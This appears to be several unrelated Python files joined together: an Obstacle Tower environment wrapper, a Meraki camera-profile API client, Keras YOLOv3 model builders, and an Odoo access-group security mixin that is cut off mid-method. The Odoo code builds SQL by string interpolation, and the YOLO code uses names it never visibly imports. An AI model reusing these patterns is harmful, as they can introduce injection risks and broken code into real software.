        return ObstacleTower("obstacle-tower-env/obstacletower_v4.0_windows/ObstacleTower",
                             retro=True, realtime_mode=False, greyscale=True)

    def seed(self, seed):
        self.wrapped_env.seed(seed)

    def floor(self, floor):
        self.wrapped_env.floor(floor)

    @staticmethod
    def action_to_mda(action, simple_action=True):
        """Decode a flat discrete action into [movement, cam_rot, jump, turn]."""
        if simple_action:
            # Simple space: 9 actions = 3 movements x 3 camera rotations.
            movement, cam_rot = divmod(action, 3)
            jump, turn = 0, 0
        else:
            # Full space: 54 actions in mixed radix 3 x 3 x 2 x 3.
            movement, remainder = divmod(action, 18)
            cam_rot, remainder = divmod(remainder, 6)
            jump, turn = divmod(remainder, 3)
        return np.array([movement, cam_rot, jump, turn])

    @staticmethod
    def mda_to_discrete(mda):
        """Encode [movement, cam_rot, jump, turn] into a flat discrete action."""
        return mda[0] * 18 + mda[1] * 6 + mda[2] * 3 + mda[3]

    def render(self):
        # Upscale 4x and display inline (notebook) instead of a native window.
        frame = cv2.resize(self.wrapped_env.render(), (0, 0), fx=4.0, fy=4.0)
        display.clear_output(wait=True)
        display.display(Image.fromarray(frame))
        time.sleep(1 / 60)

    def step(self, action, simple_action=False, render=False):
        skip_buffer = torch.zeros(2, 84, 84, device=self.device)
        if simple_action:
            # Map the reduced action id onto the full discrete space.
            action = self.mda_to_discrete(self.action_to_mda(action))
        return self._step(action, skip_buffer, render)

    def _process_observation(self, observation):
        # Retro-mode frames are already greyscale 84x84; drop the channel
        # axis and scale to [0, 1].
        flat = observation.squeeze()
        return torch.tensor(flat, dtype=torch.float32, device=self.device).div_(255)
|
class AsyncCameraQualityRetentionProfiles:
    """Async wrapper for the Meraki Dashboard API v0 endpoints that manage
    a network's camera quality/retention profiles.

    All methods delegate the HTTP call to the injected session object and
    return its awaited response.
    """

    def __init__(self, session):
        super().__init__()
        # REST session providing async get/post/put/delete.
        self._session = session

    async def getNetworkCameraQualityRetentionProfiles(self, networkId: str):
        """
        **List the quality retention profiles for this network**
        https://developer.cisco.com/docs/meraki-api-v0/#!get-network-camera-quality-retention-profiles

        - networkId (string)
        """

        metadata = {
            'tags': ['Camera quality retention profiles'],
            'operation': 'getNetworkCameraQualityRetentionProfiles',
        }
        resource = f'/networks/{networkId}/camera/qualityRetentionProfiles'

        return await self._session.get(metadata, resource)

    async def createNetworkCameraQualityRetentionProfile(self, networkId: str, name: str, **kwargs):
        """
        **Creates new quality retention profile for this network.**
        https://developer.cisco.com/docs/meraki-api-v0/#!create-network-camera-quality-retention-profile

        - networkId (string)
        - name (string): The name of the new profile. Must be unique. This parameter is required.
        - motionBasedRetentionEnabled (boolean): Deletes footage older than 3 days in which no motion was detected. Can be either true or false. Defaults to false.
        - restrictedBandwidthModeEnabled (boolean): Disable features that require additional bandwidth such as Motion Recap. Can be either true or false. Defaults to false.
        - audioRecordingEnabled (boolean): Whether or not to record audio. Can be either true or false. Defaults to false.
        - cloudArchiveEnabled (boolean): Create redundant video backup using Cloud Archive. Can be either true or false. Defaults to false.
        - motionDetectorVersion (integer): The version of the motion detector that will be used by the camera. Only applies to Gen 2 cameras. Defaults to v2.
        - scheduleId (string): Schedule for which this camera will record video, or 'null' to always record.
        - maxRetentionDays (integer): The maximum number of days for which the data will be stored, or 'null' to keep data until storage space runs out. If the former, it can be one of [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 14, 30, 60, 90] days
        - videoSettings (object): Video quality and resolution settings for all the camera models.
        """

        # Merge the explicit arguments into kwargs; unrelated locals (self,
        # networkId, kwargs itself) are filtered out by body_params below.
        kwargs.update(locals())

        metadata = {
            'tags': ['Camera quality retention profiles'],
            'operation': 'createNetworkCameraQualityRetentionProfile',
        }
        resource = f'/networks/{networkId}/camera/qualityRetentionProfiles'

        # Only whitelisted keys are sent in the request body.
        body_params = ['name', 'motionBasedRetentionEnabled', 'restrictedBandwidthModeEnabled', 'audioRecordingEnabled', 'cloudArchiveEnabled', 'motionDetectorVersion', 'scheduleId', 'maxRetentionDays', 'videoSettings']
        payload = {k: v for (k, v) in kwargs.items() if k in body_params}

        return await self._session.post(metadata, resource, payload)

    async def getNetworkCameraQualityRetentionProfile(self, networkId: str, qualityRetentionProfileId: str):
        """
        **Retrieve a single quality retention profile**
        https://developer.cisco.com/docs/meraki-api-v0/#!get-network-camera-quality-retention-profile

        - networkId (string)
        - qualityRetentionProfileId (string)
        """

        metadata = {
            'tags': ['Camera quality retention profiles'],
            'operation': 'getNetworkCameraQualityRetentionProfile',
        }
        resource = f'/networks/{networkId}/camera/qualityRetentionProfiles/{qualityRetentionProfileId}'

        return await self._session.get(metadata, resource)

    async def updateNetworkCameraQualityRetentionProfile(self, networkId: str, qualityRetentionProfileId: str, **kwargs):
        """
        **Update an existing quality retention profile for this network.**
        https://developer.cisco.com/docs/meraki-api-v0/#!update-network-camera-quality-retention-profile

        - networkId (string)
        - qualityRetentionProfileId (string)
        - name (string): The name of the new profile. Must be unique.
        - motionBasedRetentionEnabled (boolean): Deletes footage older than 3 days in which no motion was detected. Can be either true or false. Defaults to false.
        - restrictedBandwidthModeEnabled (boolean): Disable features that require additional bandwidth such as Motion Recap. Can be either true or false. Defaults to false.
        - audioRecordingEnabled (boolean): Whether or not to record audio. Can be either true or false. Defaults to false.
        - cloudArchiveEnabled (boolean): Create redundant video backup using Cloud Archive. Can be either true or false. Defaults to false.
        - motionDetectorVersion (integer): The version of the motion detector that will be used by the camera. Only applies to Gen 2 cameras. Defaults to v2.
        - scheduleId (string): Schedule for which this camera will record video, or 'null' to always record.
        - maxRetentionDays (integer): The maximum number of days for which the data will be stored, or 'null' to keep data until storage space runs out. If the former, it can be one of [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 14, 30, 60, 90] days
        - videoSettings (object): Video quality and resolution settings for all the camera models.
        """

        # Merge the explicit arguments into kwargs; unrelated locals are
        # filtered out by body_params below.
        kwargs.update(locals())

        metadata = {
            'tags': ['Camera quality retention profiles'],
            'operation': 'updateNetworkCameraQualityRetentionProfile',
        }
        resource = f'/networks/{networkId}/camera/qualityRetentionProfiles/{qualityRetentionProfileId}'

        # Only whitelisted keys are sent in the request body.
        body_params = ['name', 'motionBasedRetentionEnabled', 'restrictedBandwidthModeEnabled', 'audioRecordingEnabled', 'cloudArchiveEnabled', 'motionDetectorVersion', 'scheduleId', 'maxRetentionDays', 'videoSettings']
        payload = {k: v for (k, v) in kwargs.items() if k in body_params}

        return await self._session.put(metadata, resource, payload)

    async def deleteNetworkCameraQualityRetentionProfile(self, networkId: str, qualityRetentionProfileId: str):
        """
        **Delete an existing quality retention profile for this network.**
        https://developer.cisco.com/docs/meraki-api-v0/#!delete-network-camera-quality-retention-profile

        - networkId (string)
        - qualityRetentionProfileId (string)
        """

        metadata = {
            'tags': ['Camera quality retention profiles'],
            'operation': 'deleteNetworkCameraQualityRetentionProfile',
        }
        resource = f'/networks/{networkId}/camera/qualityRetentionProfiles/{qualityRetentionProfileId}'

        return await self._session.delete(metadata, resource)
|
<reponame>rootadminWalker/keras-YOLOv3-model-set
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""YOLO_v3 Darknet Model Defined in Keras."""
from tensorflow.keras.layers import Conv2D, Add, ZeroPadding2D, UpSampling2D, Concatenate, MaxPooling2D, GlobalAveragePooling2D, Flatten, Softmax, Reshape, Input
from tensorflow.keras.models import Model
from tensorflow.keras import backend as K
from keras_applications.imagenet_utils import _obtain_input_shape
from .layers import compose, DarknetConv2D, DarknetConv2D_BN_Leaky, Depthwise_Separable_Conv2D_BN_Leaky, Darknet_Depthwise_Separable_Conv2D_BN_Leaky
#from yolo3.models.layers import make_last_layers, make_depthwise_separable_last_layers, make_spp_last_layers
from .layers import yolo3_predictions, yolo3lite_predictions, tiny_yolo3_predictions, tiny_yolo3lite_predictions
def resblock_body(x, num_filters, num_blocks):
    '''A series of resblocks starting with a downsampling Convolution2D.

    Downsamples by 2 with a strided 3x3 conv, then stacks num_blocks
    residual units of (1x1 bottleneck -> 3x3 conv -> add).
    '''
    # Darknet uses left and top padding instead of 'same' mode.
    net = ZeroPadding2D(((1, 0), (1, 0)))(x)
    net = DarknetConv2D_BN_Leaky(num_filters, (3, 3), strides=(2, 2))(net)
    for _ in range(num_blocks):
        shortcut = net
        net = DarknetConv2D_BN_Leaky(num_filters // 2, (1, 1))(shortcut)
        net = DarknetConv2D_BN_Leaky(num_filters, (3, 3))(net)
        net = Add()([shortcut, net])
    return net
def darknet53_body(x):
    '''Darknet53 body having 52 Convolution2D layers.'''
    net = DarknetConv2D_BN_Leaky(32, (3, 3))(x)
    # One downsampling resblock stage per (num_filters, num_blocks) pair.
    for stage_filters, stage_blocks in ((64, 1), (128, 2), (256, 8), (512, 8), (1024, 4)):
        net = resblock_body(net, stage_filters, stage_blocks)
    return net
def depthwise_separable_resblock_body(x, num_filters, num_blocks):
    '''A series of resblocks starting with a downsampling Convolution2D.

    Same topology as resblock_body, but the 3x3 convolutions are
    depthwise-separable.
    '''
    # Darknet uses left and top padding instead of 'same' mode.
    net = ZeroPadding2D(((1, 0), (1, 0)))(x)
    net = Darknet_Depthwise_Separable_Conv2D_BN_Leaky(num_filters, (3, 3), strides=(2, 2))(net)
    for _ in range(num_blocks):
        shortcut = net
        net = DarknetConv2D_BN_Leaky(num_filters // 2, (1, 1))(shortcut)
        net = Darknet_Depthwise_Separable_Conv2D_BN_Leaky(num_filters, (3, 3))(net)
        net = Add()([shortcut, net])
    return net
def darknet53lite_body(x):
    '''Darknet body having 52 Convolution2D layers (depthwise-separable variant).'''
    net = Darknet_Depthwise_Separable_Conv2D_BN_Leaky(32, (3, 3))(x)
    # One downsampling resblock stage per (num_filters, num_blocks) pair.
    for stage_filters, stage_blocks in ((64, 1), (128, 2), (256, 8), (512, 8), (1024, 4)):
        net = depthwise_separable_resblock_body(net, stage_filters, stage_blocks)
    return net
def yolo3_body(inputs, num_anchors, num_classes, weights_path=None):
    """Create YOLO_V3 model CNN body in Keras.

    inputs: Keras Input tensor for the image.
    num_anchors: anchors per prediction scale.
    num_classes: number of object classes.
    weights_path: optional backbone weights loaded by layer name.
    Returns a Model with three prediction outputs (one per scale).
    """
    darknet = Model(inputs, darknet53_body(inputs))
    if weights_path is not None:
        darknet.load_weights(weights_path, by_name=True)
        print('Load weights {}.'.format(weights_path))

    # Backbone feature maps at three scales; spatial sizes assume a
    # 416x416 input. The integer indices pick fixed layers out of the
    # darknet53 graph, so layer creation order must not change.
    # f1: 13 x 13 x 1024
    f1 = darknet.output
    # f2: 26 x 26 x 512
    f2 = darknet.layers[152].output
    # f3: 52 x 52 x 256
    f3 = darknet.layers[92].output

    f1_channel_num = 1024
    f2_channel_num = 512
    f3_channel_num = 256

    y1, y2, y3 = yolo3_predictions((f1, f2, f3), (f1_channel_num, f2_channel_num, f3_channel_num), num_anchors, num_classes)

    return Model(inputs, [y1, y2, y3])
#def custom_yolo3_body(inputs, num_anchors, num_classes, weights_path):
#'''Create a custom YOLO_v3 model, use
#pre-trained weights from darknet and fit
#for our target classes.'''
##TODO: get darknet class number from class file
#num_classes_coco = 80
#base_model = yolo3_body(inputs, num_anchors, num_classes_coco)
#base_model.load_weights(weights_path, by_name=True)
#print('Load weights {}.'.format(weights_path))
##base_model.summary()
##from tensorflow.keras.utils import plot_model as plot
##plot(base_model, to_file='model.png', show_shapes=True)
##get conv output in original network
#y1 = base_model.get_layer('leaky_re_lu_57').output
#y2 = base_model.get_layer('leaky_re_lu_64').output
#y3 = base_model.get_layer('leaky_re_lu_71').output
#y1 = DarknetConv2D(num_anchors*(num_classes+5), (1,1), name='predict_conv_1')(y1)
#y2 = DarknetConv2D(num_anchors*(num_classes+5), (1,1), name='predict_conv_2')(y2)
#y3 = DarknetConv2D(num_anchors*(num_classes+5), (1,1), name='predict_conv_3')(y3)
#return Model(inputs, [y1,y2,y3])
def yolo3_spp_body(inputs, num_anchors, num_classes, weights_path=None):
    """Create YOLO_V3 SPP model CNN body in Keras.

    Identical to yolo3_body except that the prediction head inserts a
    Spatial Pyramid Pooling block (use_spp=True).
    """
    darknet = Model(inputs, darknet53_body(inputs))
    if weights_path is not None:
        darknet.load_weights(weights_path, by_name=True)
        print('Load weights {}.'.format(weights_path))

    # Backbone feature maps; fixed layer indices depend on exact layer
    # creation order in darknet53_body.
    # f1: 13 x 13 x 1024
    f1 = darknet.output
    # f2: 26 x 26 x 512
    f2 = darknet.layers[152].output
    # f3: 52 x 52 x 256
    f3 = darknet.layers[92].output

    f1_channel_num = 1024
    f2_channel_num = 512
    f3_channel_num = 256

    y1, y2, y3 = yolo3_predictions((f1, f2, f3), (f1_channel_num, f2_channel_num, f3_channel_num), num_anchors, num_classes, use_spp=True)

    return Model(inputs, [y1, y2, y3])
def custom_yolo3_spp_body(inputs, num_anchors, num_classes, weights_path):
    '''Create a custom YOLO_v3 SPP model, use
    pre-trained weights from darknet and fit
    for our target classes.'''
    #TODO: get darknet class number from class file
    num_classes_coco = 80
    base_model = yolo3_spp_body(inputs, num_anchors, num_classes_coco)
    # by_name=False: weights are loaded by topological layer order, so the
    # base model must match the checkpoint architecture exactly.
    base_model.load_weights(weights_path, by_name=False)
    print('Load weights {}.'.format(weights_path))

    # reform the predict conv layer for custom dataset classes
    # Negative indices select the three leaky-relu outputs that feed the
    # original predict convs (the last 3 layers being replaced).
    #y1 = base_model.get_layer('leaky_re_lu_58').output
    #y2 = base_model.get_layer('leaky_re_lu_65').output
    #y3 = base_model.get_layer('leaky_re_lu_72').output
    y1 = base_model.layers[-6].output
    y2 = base_model.layers[-5].output
    y3 = base_model.layers[-4].output

    # Fresh 1x1 predict convs sized for the custom class count.
    y1 = DarknetConv2D(num_anchors*(num_classes+5), (1,1), name='predict_conv_1')(y1)
    y2 = DarknetConv2D(num_anchors*(num_classes+5), (1,1), name='predict_conv_2')(y2)
    y3 = DarknetConv2D(num_anchors*(num_classes+5), (1,1), name='predict_conv_3')(y3)
    return Model(inputs, [y1,y2,y3])
def yolo3lite_body(inputs, num_anchors, num_classes):
    """Create YOLO_V3 Lite model CNN body in Keras.

    Uses the depthwise-separable darknet backbone and lite prediction head.
    """
    darknetlite = Model(inputs, darknet53lite_body(inputs))

    # NOTE(review): indices 152/92 appear copied from the non-lite
    # darknet53 body; the depthwise-separable backbone may have a
    # different layer count — verify they still select the 26x26 and
    # 52x52 feature maps.
    # f1: 13 x 13 x 1024
    f1 = darknetlite.output
    # f2: 26 x 26 x 512
    f2 = darknetlite.layers[152].output
    # f3: 52 x 52 x 256
    f3 = darknetlite.layers[92].output

    f1_channel_num = 1024
    f2_channel_num = 512
    f3_channel_num = 256

    y1, y2, y3 = yolo3lite_predictions((f1, f2, f3), (f1_channel_num, f2_channel_num, f3_channel_num), num_anchors, num_classes)

    return Model(inputs, [y1, y2, y3])
def tiny_yolo3_body(inputs, num_anchors, num_classes):
    '''Create Tiny YOLO_v3 model CNN body in keras.

    Returns a Model with two prediction outputs: 13x13 and 26x26 scale
    for a 416x416 input, each with num_anchors*(num_classes+5) channels.
    '''
    #feature map 2 (26x26x256 for 416 input)
    f2 = compose(
            DarknetConv2D_BN_Leaky(16, (3,3)),
            MaxPooling2D(pool_size=(2,2), strides=(2,2), padding='same'),
            DarknetConv2D_BN_Leaky(32, (3,3)),
            MaxPooling2D(pool_size=(2,2), strides=(2,2), padding='same'),
            DarknetConv2D_BN_Leaky(64, (3,3)),
            MaxPooling2D(pool_size=(2,2), strides=(2,2), padding='same'),
            DarknetConv2D_BN_Leaky(128, (3,3)),
            MaxPooling2D(pool_size=(2,2), strides=(2,2), padding='same'),
            DarknetConv2D_BN_Leaky(256, (3,3)))(inputs)

    #feature map 1 (13x13x1024 for 416 input)
    # Note the final pooling uses strides=(1,1): it keeps 13x13 resolution.
    f1 = compose(
            MaxPooling2D(pool_size=(2,2), strides=(2,2), padding='same'),
            DarknetConv2D_BN_Leaky(512, (3,3)),
            MaxPooling2D(pool_size=(2,2), strides=(1,1), padding='same'),
            DarknetConv2D_BN_Leaky(1024, (3,3)))(f2)

    #feature map 1 transform
    x1 = DarknetConv2D_BN_Leaky(256, (1,1))(f1)

    #feature map 1 output (13x13 for 416 input)
    y1 = compose(
            DarknetConv2D_BN_Leaky(512, (3,3)),
            DarknetConv2D(num_anchors*(num_classes+5), (1,1), name='predict_conv_1'))(x1)

    #upsample fpn merge for feature map 1 & 2
    x2 = compose(
            DarknetConv2D_BN_Leaky(128, (1,1)),
            UpSampling2D(2))(x1)

    #feature map 2 output (26x26 for 416 input)
    y2 = compose(
            Concatenate(),
            DarknetConv2D_BN_Leaky(256, (3,3)),
            DarknetConv2D(num_anchors*(num_classes+5), (1,1), name='predict_conv_2'))([x2, f2])

    return Model(inputs, [y1,y2])
def custom_tiny_yolo3_body(inputs, num_anchors, num_classes, weights_path):
    '''Create a custom Tiny YOLO_v3 model, use
    pre-trained weights from darknet and fit
    for our target classes.'''
    #TODO: get darknet class number from class file
    num_classes_coco = 80
    base_model = tiny_yolo3_body(inputs, num_anchors, num_classes_coco)
    # by_name=False: weights are loaded by topological layer order, so the
    # base model must match the checkpoint architecture exactly.
    base_model.load_weights(weights_path, by_name=False)
    print('Load weights {}.'.format(weights_path))

    #get conv output in original network
    # Fixed indices select the leaky-relu outputs that feed the original
    # predict convs; valid only while tiny_yolo3_body's layer order is fixed.
    #y1 = base_model.get_layer('leaky_re_lu_8').output
    #y2 = base_model.get_layer('leaky_re_lu_10').output
    y1 = base_model.layers[40].output
    y2 = base_model.layers[41].output

    # Fresh 1x1 predict convs sized for the custom class count.
    y1 = DarknetConv2D(num_anchors*(num_classes+5), (1,1), name='predict_conv_1')(y1)
    y2 = DarknetConv2D(num_anchors*(num_classes+5), (1,1), name='predict_conv_2')(y2)
    return Model(inputs, [y1,y2])
def tiny_yolo3lite_body(inputs, num_anchors, num_classes):
    '''Create Tiny YOLO_v3 Lite model CNN body in keras.

    Same topology as tiny_yolo3_body, but with depthwise-separable 3x3
    convolutions. Returns a Model with two prediction outputs (13x13 and
    26x26 scale for a 416x416 input).
    '''
    #feature map 2 (26x26x256 for 416 input)
    f2 = compose(
            Depthwise_Separable_Conv2D_BN_Leaky(16, (3,3)),
            MaxPooling2D(pool_size=(2,2), strides=(2,2), padding='same'),
            Depthwise_Separable_Conv2D_BN_Leaky(32, (3,3)),
            MaxPooling2D(pool_size=(2,2), strides=(2,2), padding='same'),
            Depthwise_Separable_Conv2D_BN_Leaky(64, (3,3)),
            MaxPooling2D(pool_size=(2,2), strides=(2,2), padding='same'),
            Depthwise_Separable_Conv2D_BN_Leaky(128, (3,3)),
            MaxPooling2D(pool_size=(2,2), strides=(2,2), padding='same'),
            Depthwise_Separable_Conv2D_BN_Leaky(256, (3,3)))(inputs)

    #feature map 1 (13x13x1024 for 416 input)
    f1 = compose(
            MaxPooling2D(pool_size=(2,2), strides=(2,2), padding='same'),
            Depthwise_Separable_Conv2D_BN_Leaky(512, (3,3)),
            MaxPooling2D(pool_size=(2,2), strides=(1,1), padding='same'),
            Depthwise_Separable_Conv2D_BN_Leaky(1024, (3,3)))(f2)

    #feature map 1 transform
    x1 = DarknetConv2D_BN_Leaky(256, (1,1))(f1)

    #feature map 1 output (13x13 for 416 input)
    # BUG FIX: the head was applied to `x2`, which is only assigned below,
    # so calling this function raised UnboundLocalError. It must consume
    # `x1`, matching tiny_yolo3_body.
    y1 = compose(
            Depthwise_Separable_Conv2D_BN_Leaky(512, (3,3)),
            DarknetConv2D(num_anchors*(num_classes+5), (1,1), name='predict_conv_1'))(x1)

    #upsample fpn merge for feature map 1 & 2
    x2 = compose(
            DarknetConv2D_BN_Leaky(128, (1,1)),
            UpSampling2D(2))(x1)

    #feature map 2 output (26x26 for 416 input)
    y2 = compose(
            Concatenate(),
            Depthwise_Separable_Conv2D_BN_Leaky(256, (3,3)),
            DarknetConv2D(num_anchors*(num_classes+5), (1,1), name='predict_conv_2'))([x2, f2])

    return Model(inputs, [y1,y2])
# Release assets hosting the pretrained darknet53 ImageNet weights
# downloaded by DarkNet53() below.
BASE_WEIGHT_PATH = (
    'https://github.com/david8862/keras-YOLOv3-model-set/'
    'releases/download/v1.0.1/')
def DarkNet53(input_shape=None,
              input_tensor=None,
              include_top=True,
              weights='imagenet',
              pooling=None,
              classes=1000,
              **kwargs):
    """Generate darknet53 model for Imagenet classification.

    Follows the keras-applications builder convention: optional
    classification head (include_top), optional pretrained 'imagenet'
    weights, and 'avg'/'max' global pooling for the headless variant.
    """
    # NOTE(review): `os` is not among this module's visible imports —
    # confirm it is imported at file top.
    if not (weights in {'imagenet', None} or os.path.exists(weights)):
        raise ValueError('The `weights` argument should be either '
                         '`None` (random initialization), `imagenet` '
                         '(pre-training on ImageNet), '
                         'or the path to the weights file to be loaded.')

    if weights == 'imagenet' and include_top and classes != 1000:
        raise ValueError('If using `weights` as `"imagenet"` with `include_top`'
                         ' as true, `classes` should be 1000')

    # Determine proper input shape
    input_shape = _obtain_input_shape(input_shape,
                                      default_size=224,
                                      min_size=28,
                                      data_format=K.image_data_format(),
                                      require_flatten=include_top,
                                      weights=weights)

    if input_tensor is None:
        img_input = Input(shape=input_shape)
    else:
        img_input = input_tensor

    x = darknet53_body(img_input)

    if include_top:
        model_name='darknet53'
        # Fully-convolutional head: GAP -> 1x1 conv acting as the classifier.
        x = GlobalAveragePooling2D(name='avg_pool')(x)
        x = Reshape((1, 1, 1024))(x)
        x = DarknetConv2D(classes, (1, 1))(x)
        x = Flatten()(x)
        x = Softmax(name='Predictions/Softmax')(x)
    else:
        model_name='darknet53_headless'
        if pooling == 'avg':
            x = GlobalAveragePooling2D(name='avg_pool')(x)
        elif pooling == 'max':
            # NOTE(review): GlobalMaxPooling2D is not in the visible import
            # list (only GlobalAveragePooling2D is) — this branch would
            # raise NameError; confirm the import exists at file top.
            x = GlobalMaxPooling2D(name='max_pool')(x)

    # Ensure that the model takes into account
    # any potential predecessors of `input_tensor`.
    if input_tensor is not None:
        # NOTE(review): get_source_inputs is not visibly imported — confirm.
        inputs = get_source_inputs(input_tensor)
    else:
        inputs = img_input

    # Create model.
    model = Model(inputs, x, name=model_name)

    # Load weights.
    if weights == 'imagenet':
        if include_top:
            file_name = 'darknet53_weights_tf_dim_ordering_tf_kernels_224.h5'
            weight_path = BASE_WEIGHT_PATH + file_name
        else:
            file_name = 'darknet53_weights_tf_dim_ordering_tf_kernels_224_no_top.h5'
            weight_path = BASE_WEIGHT_PATH + file_name

        # NOTE(review): get_file (keras.utils) is not visibly imported — confirm.
        weights_path = get_file(file_name, weight_path, cache_subdir='models')
        model.load_weights(weights_path)
    elif weights is not None:
        model.load_weights(weights)

    return model
|
###################################################################################
#
# Copyright (C) 2017 MuK IT GmbH
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
###################################################################################
import logging
from odoo import _, SUPERUSER_ID
from odoo import models, api, fields
from odoo.exceptions import AccessError
from odoo.addons.muk_security.tools import helper
_logger = logging.getLogger(__name__)
class BaseModelAccessGroups(models.AbstractModel):
    """Abstract mixin that protects records with many2many access groups.

    Records are linked to 'muk_security.groups' records carrying
    per-operation permission flags (perm_read/create/write/unlink).
    The checks are evaluated with raw SQL against the generated relation
    tables 'muk_groups_<model>_rel' / 'muk_groups_complete_<model>_rel'.
    """

    _name = 'muk_security.access_groups'
    _description = "MuK Access Groups Model"
    _inherit = 'muk_security.access'

    # Set it to True to enforce security even if no group has been set
    _strict_security = False

    # If set the group fields are restricted by the access group
    _field_groups = None

    # If set the suspend fields are restricted by the access group
    _suspend_groups = None

    #----------------------------------------------------------
    # Database
    #----------------------------------------------------------

    @api.model
    def _add_magic_fields(self):
        """Inject the security-related fields into the inheriting model."""
        super(BaseModelAccessGroups, self)._add_magic_fields()

        def add(name, field):
            # Do not overwrite fields explicitly defined by the model.
            if name not in self._fields:
                self._add_field(name, field)

        # e.g. _name 'muk_dms.file' -> base 'muk_dms', model 'file'
        base, model = self._name.split(".")
        add('suspend_security_read', fields.Boolean(
            _module=base,
            string="Suspend Security for Read",
            automatic=True,
            default=False,
            groups=self._suspend_groups))
        add('suspend_security_create', fields.Boolean(
            _module=base,
            string="Suspend Security for Create",
            automatic=True,
            default=False,
            groups=self._suspend_groups))
        add('suspend_security_write', fields.Boolean(
            _module=base,
            string="Suspend Security for Write",
            automatic=True,
            default=False,
            groups=self._suspend_groups))
        add('suspend_security_unlink', fields.Boolean(
            _module=base,
            string="Suspend Security for Unlink",
            automatic=True,
            default=False,
            groups=self._suspend_groups))
        add('groups', fields.Many2many(
            _module=base,
            comodel_name='muk_security.groups',
            relation='muk_groups_%s_rel' % model,
            column1='aid',
            column2='gid',
            string="Groups",
            automatic=True,
            groups=self._field_groups))
        add('complete_groups', fields.Many2many(
            _module=base,
            comodel_name='muk_security.groups',
            relation='muk_groups_complete_%s_rel' % model,
            column1='aid',
            column2='gid',
            string="Complete Groups",
            compute='_compute_groups',
            store=True,
            automatic=True,
            groups=self._field_groups))

    #----------------------------------------------------------
    # Function
    #----------------------------------------------------------

    @api.multi
    def trigger_computation(self, fields, *largs, **kwargs):
        # NOTE: the parameter `fields` shadows the odoo `fields` module
        # inside this method; kept unchanged for API compatibility.
        super(BaseModelAccessGroups, self).trigger_computation(fields, *largs, **kwargs)
        if "complete_groups" in fields:
            # Recompute with security suspended to avoid recursive checks.
            self.suspend_security()._compute_groups()

    @api.model
    def check_group_values(self, values):
        """Return True if `values` touches a group-defining field."""
        if any(field in values for field in ['groups']):
            return True
        return False

    @api.multi
    @api.returns('muk_security.groups')
    def get_groups(self):
        """Return the directly assigned groups of a single record."""
        self.ensure_one()
        groups = self.env['muk_security.groups']
        groups |= self.groups
        return groups

    @api.model
    def _get_no_access_ids(self, operation):
        """IDs of records with no group granting `operation` at all.

        In non-strict mode such "ungrouped" records are open to everyone;
        in strict mode the list is empty so they stay protected.
        """
        base, model = self._name.split(".")
        if not self._strict_security:
            # NOTE(review): identifiers are interpolated directly into the
            # SQL; safe only while `operation` comes from internal callers.
            sql = '''
                SELECT id
                FROM %s a
                WHERE NOT EXISTS (
                    SELECT *
                    FROM muk_groups_complete_%s_rel r
                    JOIN muk_security_groups g ON r.gid = g.id
                    WHERE r.aid = a.id AND g.perm_%s = true
                );
            ''' % (self._table, model, operation)
            self.env.cr.execute(sql)
            fetch = self.env.cr.fetchall()
            return len(fetch) > 0 and list(map(lambda x: x[0], fetch)) or []
        else:
            return []

    @api.model
    def _get_suspended_access_ids(self, operation):
        """IDs of records whose security for `operation` is suspended."""
        base, model = self._name.split(".")
        sql = '''
            SELECT id
            FROM %s a
            WHERE a.suspend_security_%s = true
        ''' % (self._table, operation)
        self.env.cr.execute(sql)
        fetch = self.env.cr.fetchall()
        return len(fetch) > 0 and list(map(lambda x: x[0], fetch)) or []

    @api.model
    def _get_access_ids(self):
        """IDs of records the current user may read via his groups."""
        base, model = self._name.split(".")
        sql = '''
            SELECT r.aid
            FROM muk_groups_complete_%s_rel r
            JOIN muk_security_groups g ON r.gid = g.id
            JOIN muk_security_groups_users_rel u ON r.gid = u.gid
            WHERE u.uid = %s AND g.perm_read = true
        ''' % (model, self.env.user.id)
        self.env.cr.execute(sql)
        fetch = self.env.cr.fetchall()
        access_ids = len(fetch) > 0 and list(map(lambda x: x[0], fetch)) or []
        return access_ids

    @api.model
    def _get_ids_without_security(self, operation):
        # Records that skip the check: ungrouped (non-strict) or suspended.
        no_access_ids = self._get_no_access_ids(operation)
        suspended_access_ids = self._get_suspended_access_ids(operation)
        return list(set(no_access_ids).union(suspended_access_ids))

    @api.model
    def _get_complete_access_ids(self, operation):
        # Union of granted, ungrouped and suspended record ids.
        access_ids = self._get_access_ids()
        no_access_ids = self._get_no_access_ids(operation)
        suspended_access_ids = self._get_suspended_access_ids(operation)
        return list(set(access_ids).union(no_access_ids, suspended_access_ids))

    @api.multi
    def _eval_access_skip(self, operation):
        # Security is bypassed entirely when running under a NoSecurityUid.
        if isinstance(self.env.uid, helper.NoSecurityUid):
            return True
        return False

    @api.multi
    def check_access_groups(self, operation):
        """Raise AccessError if any record denies `operation` to the user."""
        if self.env.user.id == SUPERUSER_ID or self._eval_access_skip(operation):
            return None
        base, model = self._name.split(".")
        filter_ids = self._get_ids_without_security(operation)
        for record in self.filtered(lambda rec: rec.id not in filter_ids):
            sql = '''
                SELECT perm_%s
                FROM muk_groups_complete_%s_rel r
                JOIN muk_security_groups g ON g.id = r.gid
                JOIN muk_security_groups_users_rel u ON u.gid = g.id
                WHERE r.aid = %s AND u.uid = %s
            ''' % (operation, model, record.id, self.env.user.id)
            self.env.cr.execute(sql)
            fetch = self.env.cr.fetchall()
            if not any(list(map(lambda x: x[0], fetch))):
                raise AccessError(_("This operation is forbidden!"))

    @api.multi
    def check_access(self, operation, raise_exception=False):
        """Combine the inherited access check with the group-based check."""
        res = super(BaseModelAccessGroups, self).check_access(operation, raise_exception)
        try:
            # check_access_groups returns None on success and raises otherwise.
            access_groups = self.check_access_groups(operation) == None
            access = res and access_groups
            if not access and raise_exception:
                raise AccessError(_("This operation is forbidden!"))
            return access
        except AccessError:
            if raise_exception:
                raise AccessError(_("This operation is forbidden!"))
            return False

    #----------------------------------------------------------
    # Read
    #----------------------------------------------------------

    @api.multi
    def _after_read(self, result, *largs, **kwargs):
        """Filter read() result dicts down to readable records."""
